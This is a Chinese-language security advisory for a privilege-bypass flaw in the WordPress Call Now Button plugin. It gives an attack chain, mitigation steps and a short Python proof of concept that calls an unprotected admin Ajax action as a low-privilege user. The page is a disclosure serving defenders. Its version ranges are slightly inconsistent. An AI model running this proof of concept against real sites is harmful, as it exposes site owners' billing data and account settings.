CVE-2025-11632 CVSS 4.3 中危

CVE-2025-11632 WordPress Call Now Button插件权限绕过漏洞

披露日期: 2025-10-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-11632

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Call Now Button WordPress Plugin

漏洞概述

WordPress插件"Call Now Button"存在严重的权限绕过漏洞，版本1.5.4及之前的所有版本均受影响。该漏洞源于多个管理员Ajax函数缺少权限检查（capability check），导致低权限用户（如订阅者Subscriber角色）可以调用这些仅限管理员使用的功能。攻击者可利用此漏洞生成计费门户链接，查看和修改关联账户的账单信息，生成聊天会话令牌，查看域名状态等敏感操作。漏洞由Wordfence安全团队的安全研究员发现并报告。由于该插件涉及商业计费功能和客户数据，此漏洞可能对使用该插件的网站造成严重的数据安全风险。

技术细节

该漏洞存在于WordPress插件的CnbAdminAjax.php文件中，具体涉及多个Ajax处理函数（如第21、50、147、154、167行等）。这些函数在处理管理员操作时，未正确验证当前用户是否具有相应的管理权限。正常情况下，WordPress管理员功能应使用current_user_can('manage_options')或类似权限检查来确保只有管理员才能执行敏感操作。然而，该插件直接处理请求而未进行权限验证，允许任何已认证用户（包括最低权限的Subscriber角色）访问这些管理功能。攻击者只需构造特定的AJAX请求，指定目标函数和参数，即可触发漏洞。由于WordPress的AJAX端点对所有已登录用户开放，这使得漏洞利用门槛极低。

攻击链分析

STEP 1

步骤1

攻击者在目标WordPress网站注册一个普通用户账户（默认Subscriber角色）

STEP 2

步骤2

攻击者使用该低权限账户登录WordPress，获取有效的认证session和nonce

STEP 3

步骤3

攻击者构造AJAX请求，指向插件的admin-ajax.php端点，调用存在漏洞的管理函数

STEP 4

步骤4

由于插件未验证current_user_can('manage_options')，请求被成功处理

STEP 5

步骤5

攻击者获取计费信息、生成聊天令牌或修改账单设置，造成数据泄露或业务损失

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11632 PoC - WordPress Call Now Button Plugin Privilege Escalation
# Authenticated low-privilege users can access admin functions

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'

# WordPress AJAX endpoint
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

# Get valid nonce by first accessing admin page
session = requests.Session()

# Authenticated request examples for different vulnerable functions:
# Example 1: Generate billing portal link
data = {
    'action': 'cnb_get_billing_link',  # Vulnerable function
    '_wpnonce': 'attacker_known_nonce'  # May need to obtain valid nonce
}

response = session.post(ajax_url, data=data)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

# Note: Requires authenticated session with Subscriber role or higher
# The attacker needs a valid WordPress account (easily registrable)

影响范围

Call Now Button WordPress Plugin < 1.5.4

Call Now Button WordPress Plugin 1.5.4 (partial fix)

Call Now Button WordPress Plugin >= 1.5.5 (fully fixed)

防御指南

临时缓解措施

在无法立即升级插件的情况下，可通过以下方式临时缓解：1) 临时禁用或删除Call Now Button插件；2) 使用WordPress防火墙规则阻止非管理员访问admin-ajax.php的特定action参数；3) 限制WordPress站点的用户注册功能；4) 审查并删除所有非必要的Subscriber级别账户。建议尽快应用官方发布的安全更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表